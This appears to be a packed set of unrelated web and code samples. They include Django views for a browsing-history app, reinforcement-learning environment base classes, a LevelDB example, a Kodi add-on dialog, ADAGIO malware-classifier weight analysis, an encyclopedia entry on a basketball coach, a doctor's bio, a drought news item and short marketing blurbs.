'avatar': gravatar_for_user(friend.user),
'type': 'contact'})
if len(data) > 5:
break
return {'res': data}
@login_required
@ajax_request
def get_messages(request):
url = request.GET.get('url', '')
messages = EyeHistoryMessage.objects.filter(eyehistory__url=url).order_by('-post_time').select_related()
message_list = []
for message in messages:
eye_hist = message.eyehistory
m = twitter_username_re.sub(lambda m: '<a href="http://eyebrowse.csail.mit.edu/users/%s">%s</a>' % (m.group(1), m.group(0)), message.message)
message_list.append({'message': m,
'post_time': str(message.post_time),
'username': eye_hist.user.username,
'pic_url': gravatar_for_user(eye_hist.user),
'user_url': '%s/users/%s' % (BASE_URL, eye_hist.user.username),
'hum_time': humanize_time(
timezone.now() - message.post_time) + ' ago'
})
return {
'result': {
'messages': message_list,
}
}
@login_required
@ajax_request
def active(request):
url = request.GET.get('url', '')
domain = url_domain(url)
timestamp = timezone.now() - datetime.timedelta(days=7)
used_users = []
active_users = []
active_dusers = []
eyehists = EyeHistory.objects.filter(
(Q(url=url) | Q(domain=domain)) &
Q(start_time__gt=timestamp) &
~Q(user_id=request.user.id)
).order_by('-end_time').select_related()
for eyehist in eyehists:
if len(used_users) >= 6:
break
user = eyehist.user
if user not in used_users:
old_level = 3
if eyehist.end_time > \
(timezone.now() - datetime.timedelta(minutes=5)):
old_level = 0
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=1)):
old_level = 1
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=24)):
old_level = 2
if url == eyehist.url:
active_users.append({'username': user.username,
'pic_url': gravatar_for_user(user),
'resourceURI': '%s/users/%s' % (BASE_URL, user.username),
'old_level': old_level,
'time_ago': humanize_time(
timezone.now() - eyehist.end_time)
})
else:
active_dusers.append({'username': user.username,
'pic_url': gravatar_for_user(user),
'resourceURI': '%s/users/%s' % (BASE_URL, user.username),
'old_level': old_level,
'time_ago': humanize_time(
timezone.now() - eyehist.end_time)
})
used_users.append(user)
return {
'result': {
'page': active_users,
'domain': active_dusers
}
}
def get_stats(visits):
count = visits.count()
if count == 1:
count_text = '1 visit'
else:
count_text = '%s visits' % (count)
if count == 0:
time = '0 seconds'
else:
avg_time = float(visits.aggregate(Sum('total_time'))['total_time__sum'])/float(count)
time = humanize_time(datetime.timedelta(
milliseconds=avg_time))
time = re.sub('minutes', 'min', time)
time = re.sub('minute', 'min', time)
return count_text, time
@login_required
@ajax_request
def stats(request):
url = request.GET.get('url', '')
my_user = get_object_or_404(User, username=request.user.username)
my_visits = EyeHistory.objects.filter(user=my_user, url=url)
my_count, my_time = get_stats(my_visits)
total_visits = EyeHistory.objects.filter(url=url)
total_count, total_time = get_stats(total_visits)
domain = url_domain(url)
my_dvisits = EyeHistory.objects.filter(user=my_user, domain=domain)
my_dcount, my_dtime = get_stats(my_dvisits)
total_dvisits = EyeHistory.objects.filter(domain=domain)
total_dcount, total_dtime = get_stats(total_dvisits)
domain,_ = Domain.objects.get_or_create(url=domain)
page,_ = Page.objects.get_or_create(url=url,domain=domain)
domain_score = domain.agg_score
score = 0
error = "Success"
try:
rating = Ratings.objects.get(user=my_user,page=page)
score = rating.score
except Ratings.DoesNotExist:
error = "Failure: Rating does not exist"
res = {'my_count': my_count,
'my_time': my_time,
'total_count': total_count,
'total_time': total_time,
'my_dcount': my_dcount,
'my_dtime': my_dtime,
'total_dcount': total_dcount,
'total_dtime': total_dtime,
'score': score,
'domain_score': domain_score
}
return {
'result': res
}
|
ROSEN, YEHOSHUA (1918–2002), Israeli basketball coach. Known in Israel as "Mister Basketball" and considered one of the outstanding coaches in the country, Rosen came to Israel with his family from Egypt in the 1920s and immediately began to play basketball. At the age of 14 he was already playing on the Maccabi Tel Aviv senior team, continuing with them into the 1940s. In 1947 he was named coach of Israel's national basketball team and led it to three European tournament finals. In 1953 he became the coach of Maccabi Tel Aviv, running the team 18 years and winning 12 national championships and nine state cups. In 1984 he led Hapoel Tel Aviv to the state cup. Rosen coached for 40 years, until his retirement at the end of the 1980s, mentoring some of Israel's top homegrown players, such as Mickey *Berkowitz and Doron Jamchi. He was awarded the Israel Prize in 1989 for his contribution to Israeli basketball.
E. Sahar, "Not just a coach, but also teacher and educator," in: Ha'aretz (Feb. 7, 2002).
"Rosen, Yehoshua." Encyclopaedia Judaica. . Encyclopedia.com. 25 Apr. 2019 <https://www.encyclopedia.com>.
|
import contextlib
import os
from abc import ABC, abstractmethod
from baselines.common.tile_images import tile_images
class AlreadySteppingError(Exception):
"""
Raised when an asynchronous step is running while
step_async() is called again.
"""
def __init__(self):
msg = 'already running an async step'
Exception.__init__(self, msg)
class NotSteppingError(Exception):
"""
Raised when an asynchronous step is not running but
step_wait() is called.
"""
def __init__(self):
msg = 'not running an async step'
Exception.__init__(self, msg)
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
Used to batch data from multiple copies of an environment, so that
each observation becomes an batch of observations, and expected action is a batch of actions to
be applied per-environment.
"""
closed = False
viewer = None
metadata = {
'render.modes': ['human', 'rgb_array']
}
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a dict of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a dict of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close_extras(self):
"""
Clean up the extra resources, beyond what's in this base class.
Only runs when not self.closed.
"""
pass
def close(self):
if self.closed:
return
if self.viewer is not None:
self.viewer.close()
self.close_extras()
self.closed = True
def step(self, actions):
"""
Step the environments synchronously.
This is available for backwards compatibility.
"""
self.step_async(actions)
return self.step_wait()
def render(self, mode='human'):
imgs = self.get_images()
bigimg = tile_images(imgs)
if mode == 'human':
self.get_viewer().imshow(bigimg)
return self.get_viewer().isopen
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
def get_images(self):
"""
Return RGB images from each environment
"""
raise NotImplementedError
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def get_viewer(self):
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
return self.viewer
class VecEnvWrapper(VecEnv):
"""
An environment wrapper that applies to an entire batch
of environments at once.
"""
def __init__(self, venv, observation_space=None, action_space=None):
self.venv = venv
super().__init__(num_envs=venv.num_envs,
observation_space=observation_space or venv.observation_space,
action_space=action_space or venv.action_space)
def step_async(self, actions):
self.venv.step_async(actions)
@abstractmethod
def reset(self):
pass
@abstractmethod
def step_wait(self):
pass
def close(self):
return self.venv.close()
def render(self, mode='human'):
return self.venv.render(mode=mode)
def get_images(self):
return self.venv.get_images()
def __getattr__(self, name):
if name.startswith('_'):
raise AttributeError("attempted to get missing private attribute '{}'".format(name))
return getattr(self.venv, name)
class VecEnvObservationWrapper(VecEnvWrapper):
@abstractmethod
def process(self, obs):
pass
def reset(self):
obs = self.venv.reset()
return self.process(obs)
def step_wait(self):
obs, rews, dones, infos = self.venv.step_wait()
return self.process(obs), rews, dones, infos
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
@contextlib.contextmanager
def clear_mpi_env_vars():
"""
from mpi4py import MPI will call MPI_Init by default. If the child process has MPI environment variables, MPI will think that the child process is an MPI process just like the parent and do bad things such as hang.
This context manager is a hacky way to clear those environment variables temporarily such as when we are starting multiprocessing
Processes.
"""
removed_environment = {}
for k, v in list(os.environ.items()):
for prefix in ['OMPI_', 'PMI_']:
if k.startswith(prefix):
removed_environment[k] = v
del os.environ[k]
try:
yield
finally:
os.environ.update(removed_environment)
|
Dr. Jain is Board Certified in Family Medicine with the America Board of Family Medicine (ABFM). She graduated from medical school in India in 2001 and completed residency in Family Medicine in 2006 from the University of Tennessee Family Practice Program with Jackson Madison County General Hospital. She is a member of the American Academy of Family Physicians (AAFP) and American Society of Bariatric Physicians (ASBP).
Dr. Jain's special interests include pediatrics, women's health, hormonal therapy and bariatrics (weight management).
She is the proud mother of two kids, Sachi and Aadi. She is married to Dr. Sriv and has lived in Dyersburg for more than 10 years.
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import json
import numpy as np
#import caffe
import leveldb
def write_to_db_example(use_caffe_datum=False):
N = 1000
X = np.zeros((N, 3, 32, 32), dtype=np.uint8)
y = np.zeros(N, dtype=np.int64)
leveldb_dir_path = './myleveldb'
db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)
if use_caffe_datum:
#import caffe
import caffe_pb2
for i in range(N):
# REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
#datum = caffe.proto.caffe_pb2.Datum()
datum = caffe_pb2.Datum()
datum.channels = X.shape[1]
datum.height = X.shape[2]
datum.width = X.shape[3]
datum.data = X[i].tobytes() # or .tostring() if numpy < 1.9.
datum.label = int(y[i])
str_id = '{:08}'.format(i)
# The encode is only essential in Python 3.
db.Put(str_id.encode('ascii'), datum.SerializeToString())
else:
for i in range(N):
datum = {
'channels': X.shape[1],
'height': X.shape[2],
'width': X.shape[3],
'data': X[i].tolist(),
'label': int(y[i]),
}
str_id = '{:08}'.format(i)
# The encode is only essential in Python 3.
db.Put(str_id.encode('ascii'), json.dumps(datum).encode('ascii'))
#db.Delete(b'00000000')
#--------------------
print(db.GetStats())
def read_from_db_example(use_caffe_datum=False):
leveldb_dir_path = './myleveldb'
db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)
key = b'00000000'
try:
raw_datum = db.Get(key)
except KeyError as ex:
print('Invalid key, {}.'.format(key))
return
if use_caffe_datum:
#import caffe
import caffe_pb2
# REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
#datum = caffe.proto.caffe_pb2.Datum()
datum = caffe_pb2.Datum()
datum.ParseFromString(raw_datum)
x = np.fromstring(datum.data, dtype=np.uint8)
x = x.reshape(datum.channels, datum.height, datum.width)
y = datum.label
else:
datum = json.loads(raw_datum.decode('ascii'))
x = np.array(datum['data'], dtype=np.uint8)
x = x.reshape(datum['channels'], datum['height'], datum['width'])
y = datum['label']
print(x.shape, y)
def key_value_example(use_caffe_datum=False):
leveldb_dir_path = './myleveldb'
db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)
if use_caffe_datum:
#import caffe
import caffe_pb2
for k, v in db.RangeIter():
# REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
#datum = caffe.proto.caffe_pb2.Datum()
datum = caffe_pb2.Datum()
datum.ParseFromString(v)
x = np.fromstring(datum.data, dtype=np.uint8)
x = x.reshape(datum.channels, datum.height, datum.width)
y = datum.label
print(k.decode(), x.shape, y)
else:
for k, v in db.RangeIter():
datum = json.loads(v.decode('ascii'))
x = np.array(datum['data'], dtype=np.uint8)
x = x.reshape(datum['channels'], datum['height'], datum['width'])
y = datum['label']
print(k.decode(), x.shape, y)
def main():
# Usage:
# For using Caffe Datum:
# protoc --python_out=. caffe.proto
use_caffe_datum = False
write_to_db_example(use_caffe_datum)
#read_from_db_example(use_caffe_datum)
#key_value_example(use_caffe_datum)
#--------------------------------------------------------------------
if '__main__' == __name__:
main()
|
Summer's drought and excessive heat have led the U.S. Department of Agriculture to declare 44 Illinois counties natural disaster areas.
Farmers and ranchers in another 33 counties also qualify for assistance because they are contiguous to the affected areas.
The declaration means farmers and ranchers can qualify for low-interest emergency loans to help cover part of their actual losses. Farmers in eligible counties have eight months from Oct. 31 to apply.
Other assistance programs also are available.
Local counties included in the 44 counties are: Macon, Champaign, Christian, McLean and Piatt.
|
from threading import Thread, RLock
import xbmc
import xbmcaddon
import xbmcgui
def select_ext(title, populator, tasks_count, sort_function = None):
addonPath = xbmcaddon.Addon().getAddonInfo('path').decode('utf-8')
dlg = SelectorDialog("DialogSelect.xml", addonPath, title=title,
populator=populator, steps=tasks_count, sort_function=sort_function)
with ExtendedDialogHacks():
dlg.doModal()
selection = dlg.get_selection()
del dlg
return selection
class FanArtWindow(xbmcgui.WindowDialog):
def __init__(self):
control_background = xbmcgui.ControlImage(0, 0, 1280, 720, xbmcaddon.Addon().getAddonInfo('fanart'))
self.addControl(control_background)
fanart = xbmc.getInfoLabel('ListItem.Property(Fanart_Image)')
if fanart and fanart != "Fanart_Image":
control_fanart = xbmcgui.ControlImage(0, 0, 1280, 720, fanart)
self.addControl(control_fanart)
class ExtendedDialogHacks(object):
def __init__(self):
self.active = False
self.hide_progress = False
self.hide_info = False
self.autohidedialogs = False
if self.autohidedialogs:
self.hide_progress = False
self.hide_info = False
if not self.hide_progress and not self.hide_info:
self.autohidedialogs = False
def __enter__(self):
self.active = True
# self.numeric_keyboard = None
self.fanart_window = FanArtWindow()
## Keyboard hack
# if plugin.get_setting(SETTING_ADVANCED_KEYBOARD_HACKS, converter=bool):
# self.numeric_keyboard = xbmcgui.Window(10109)
# Thread(target = lambda: self.numeric_keyboard.show()).start()
# wait_for_dialog('numericinput', interval=50)
# Show fanart background
self.fanart_window.show()
# Run background task
if self.autohidedialogs:
Thread(target=self.background_task).start()
def background_task(self):
xbmc.sleep(1000)
while not xbmc.abortRequested and self.active:
if self.hide_progress:
active_window = xbmcgui.getCurrentWindowDialogId()
if active_window in [10101, 10151]:
xbmc.executebuiltin("Dialog.Close(%d, true)" % active_window)
if self.hide_info:
if xbmc.getCondVisibility("Window.IsActive(infodialog)"):
xbmc.executebuiltin('Dialog.Close(infodialog, true)')
xbmc.sleep(100)
def __exit__(self, exc_type, exc_value, traceback):
self.active = False
# if self.numeric_keyboard is not None:
# self.numeric_keyboard.close()
# del self.numeric_keyboard
# xbmc.executebuiltin("Dialog.Close(numericinput, true)")
self.fanart_window.close()
del self.fanart_window
class SelectorDialog(xbmcgui.WindowXMLDialog):
def __init__(self, *args, **kwargs):
xbmcgui.WindowXMLDialog.__init__(self)
self.title = kwargs['title']
self.populator = kwargs['populator']
self.steps = kwargs['steps']
self.sort_function = kwargs['sort_function']
self.items = []
self.selection = None
self.insideIndex = -1
self.completed_steps = 0
self.thread = None
self.lock = RLock()
def get_selection(self):
""" get final selection """
return self.selection
def onInit(self):
# set title
self.label = self.getControl(1)
self.label.setLabel(self.title)
# Hide ok button
self.getControl(5).setVisible(False)
# Get active list
try:
self.list = self.getControl(6)
self.list.controlLeft(self.list)
self.list.controlRight(self.list)
self.getControl(3).setVisible(False)
except:
self.list = self.getControl(3)
self.setFocus(self.list)
# populate list
self.thread = Thread(target=self._populate)
self.thread.start()
def onAction(self, action):
if action.getId() in (9, 10, 92, 216, 247, 257, 275, 61467, 61448,):
if self.insideIndex == -1:
self.close()
else:
self._inside_root(select=self.insideIndex)
def onClick(self, controlID):
if controlID == 6 or controlID == 3:
num = self.list.getSelectedPosition()
if num >= 0:
if self.insideIndex == -1:
self._inside(num)
else:
self.selection = self.items[self.insideIndex][1][num]
self.close()
def onFocus(self, controlID):
if controlID in (3, 61):
self.setFocus(self.list)
def _inside_root(self, select=-1):
with self.lock:
self.list.reset()
for source, links in self.items:
if len(links) > 1:
source += " >>"
listitem = xbmcgui.ListItem(source)
try:
icon = xbmcaddon.Addon(id=links[0]['path'].split("/")[2]).getAddonInfo('icon')
listitem.setIconImage(icon)
except:
pass
self.list.addItem(listitem)
if select >= 0:
self.list.selectItem(select)
self.insideIndex = -1
def _inside(self, num):
if num == -1:
self._inside_root(select=self.insideIndex)
return
with self.lock:
source, links = self.items[num]
if len(links) == 1:
self.selection = links[0]
self.close()
return
self.list.reset()
for item in links:
listitem = xbmcgui.ListItem(item['label'])
listitem.setProperty("Path", item['path'])
try:
pluginid = item['path'].split("/")[2]
icon = xbmcaddon.Addon(id=pluginid).getAddonInfo('icon')
listitem.setIconImage(icon)
except:
pass
self.list.addItem(listitem)
self.insideIndex = num
def step(self):
self.completed_steps += 1
progress = self.completed_steps * 100 / self.steps
self.label.setLabel(u"{0} - {1:d}% ({2}/{3})".format(self.title, progress,
self.completed_steps, self.steps))
def _populate(self):
xbmc.sleep(500) # Delay population to let ui settle
self.label.setLabel(self.title)
for result in self.populator():
self.step()
if not result:
continue
with self.lock:
# Remember selected item
selectedItem = None
if self.insideIndex == -1:
selectedIndex = self.list.getSelectedPosition()
else:
selectedIndex = self.insideIndex
if selectedIndex >= 0:
selectedItem = self.items[selectedIndex]
# Add new item
self.items.extend(result)
if self.sort_function:
self.items = sorted(self.items, key = self.sort_function)
#self.items.sort()
# Retrived new selection-index
if selectedItem is not None:
selectedIndex = self.items.index(selectedItem)
if self.insideIndex != -1:
self.insideIndex = selectedIndex
# Update only if in root
if self.insideIndex == -1:
self._inside_root(select=selectedIndex)
self.setFocus(self.list)
pass
|
This is a cool little dress for your wee one to romp in. Features two little press studs in the neck for easy dressing. The adorable tiger pattern will hide the inevitable stains, and the red piping around the neckline gives it a lovely retro feel.
100% eco and fair trade cotton.
|
#!/usr/bin/python
# ADAGIO Android Application Graph-based Classification
# featureAnalysis.py >> Analysis of features from SVM linear model
# Copyright (c) 2016 Hugo Gascon <hgascon@mail.de>
import os
import numpy as np
import networkx as nx
from random import shuffle
from adagio.common import ml
"""
Example:
import featureAnalysis as fa
w_binary = clf.best_estimator_.coef_[0]
w_agg = fa.aggregate_binary_svm_weights(w, 13)
"""
def print_largest_weights(w_agg, n):
""" Print the largest weights
"""
idx = w_agg.argsort()[::-1][:n]
w_agg_highest = w_agg[idx]
labels = [np.binary_repr(i, 15) for i in idx]
print(zip(w_agg_highest, labels))
def aggregate_binary_svm_weights(w_binary, expansion_bits):
""" Return the aggregated version of the SVM weight vector considering
the binary representation length of the original non-binary feature.
Args:
w_binary: an array of SVM weights related to binary features.
expansion_bits: the number of bits used to represent each feature in
the original feature vector.
Returns:
w: the aggregated version of the SVM weight vector
"""
feature_idx = len(w_binary) / expansion_bits # should be a int
w = np.array([sum(w_binary[expansion_bits * i:expansion_bits * (i + 1)])
for i in range(feature_idx)])
return w
def compute_neighborhoods_per_weights(d, w, n_weights, n_files=300):
""" Write report with info about highed ranked neighborhoods in a samples
according to the weights learnt by the linear SVM model.
Args:
d: directory of the files to be processed
w: linear SVM weights
n_weights: number of weights to analyze
n_files: number of files to process from directory d
Returns:
Outputs the file feature_analysis.txt
"""
files = read_files(d, "fcgnx", n_files)
sorted_weights_idx = w.argsort()[::-1]
f_out = "feature_analysis.txt".format(n_weights)
print("[*] Writing file {0}...".format(f_out))
fd = open(f_out, 'wb')
# fd.write("Total number of weights in SVM model: {0}\n".format(len(w)))
# fd.write("Selected number of highest weights per sample: {0}\n".format(n_weights))
for f in files:
fn = os.path.join(d, f)
neighborhoods, n_nodes = get_high_ranked_neighborhoods(fn, w,
sorted_weights_idx,
n_weights)
try:
if neighborhoods:
fd.write("\n\n#########################################\n\n")
fd.write(os.path.basename(f)+"\n\n")
fd.write("nodes: {0}\n\n".format(n_nodes))
fd.write("\n".join(neighborhoods))
except:
pass
fd.close()
print("[*] File written.")
def get_high_ranked_neighborhoods(fcgnx_file, w, sorted_weights_idx,
show_small=False, weights=1):
# g = FCGextractor.build_cfgnx(fcgnx_file)
g = nx.read_gpickle(fcgnx_file)
g_hash = ml.neighborhood_hash(g)
neighborhoods = []
remaining_weights = weights
for idx in sorted_weights_idx:
if remaining_weights > 0:
label_bin = np.binary_repr(idx, 15)
label = np.array([int(i) for i in label_bin])
matching_neighborhoods = []
for m, nh in g_hash.node.iteritems():
if np.array_equal(nh["label"], label):
neighbors_l = g_hash.neighbors(m)
if neighbors_l:
neighbors = '\n'.join([str(i) for i in neighbors_l])
matching_neighborhoods.append("{0}\n{1}\n{2}\n".format(w[idx],
m, neighbors))
else:
if show_small:
matching_neighborhoods.append("{0}\n{1}\n".format(w[idx], m))
if matching_neighborhoods:
remaining_weights -= 1
neighborhoods += matching_neighborhoods
else:
n_nodes = g_hash.number_of_nodes()
del g
del g_hash
return neighborhoods, n_nodes
def add_weights_to_nodes(g, w, show_labels=True):
g_hash = ml.neighborhood_hash(g)
# initialize the weight for every node in g_hash
for n, nh in g_hash.node.iteritems():
idx = int("".join([str(i) for i in nh["label"]]), 2)
w_nh = w[idx]
g_hash.node[n]["label"] = w_nh
# create a copy of the weighted graph
g_hash_weighted = g_hash.copy()
# aggregate the weights of each node with the
# original weight of its caller
for n, nh in g_hash.node.iteritems():
for neighbor in g_hash.neighbors(n):
g_hash_weighted.node[neighbor]["label"] += g_hash.node[n]["label"]
# create array of the node weigths
g_weights = []
for n, nh in g_hash_weighted.node.iteritems():
g_weights.append(nh["label"])
# normalize weight between 0.5 and 1 to plot
g_weights = np.array(g_weights)
g_weights.sort()
g_weights_norm = normalize_weights(g_weights)
g_weights_norm = g_weights_norm[::-1]
d_w_norm = dict(zip(g_weights, g_weights_norm))
# add normalized weight as color to each node
for n, nh in g_hash_weighted.node.iteritems():
w = g_hash_weighted.node[n]["label"]
g_hash_weighted.node[n]["style"] = "filled"
g_hash_weighted.node[n]["fillcolor"] = "0.000 0.000 {0}".format(d_w_norm[w])
# write function name in the label of the node or remove label
if show_labels:
for n, nh in g_hash_weighted.node.iteritems():
node_text = (n[0].split("/")[-1] + n[1] + "\n" +
str(g_hash_weighted.node[n]["label"]))
g_hash_weighted.node[n]["label"] = node_text
else:
for n, nh in g_hash_weighted.node.iteritems():
g_hash_weighted.node[n]["label"] = ""
return g_hash_weighted
def normalize_weights(a, imin=0.0, imax=1.0):
dmin = a.min()
dmax = a.max()
return imin + (imax - imin) * (a - dmin) / (dmax - dmin)
def read_files(d, file_extension, max_files=0):
files = []
for fn in os.listdir(d):
if fn.lower().endswith(file_extension):
files.append(os.path.join(d, fn))
shuffle(files)
# if max_files is 0, return all the files in dir
if max_files == 0:
max_files = len(files)
files = files[:max_files]
return files
|
That way, you can contribute to mitigating global warming while at the same time get creative with your own dwelling. Put simply, you can kill two birds with one stone with only one method of this. Well, this type of green infrastructure is also good for your house as it can save the energy. By using this type of green infrastructure, you can save energy up to 5% compared to the usual consumption.
Tags: roofing green bay, green roof nyc, green roofing, green roof companies.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.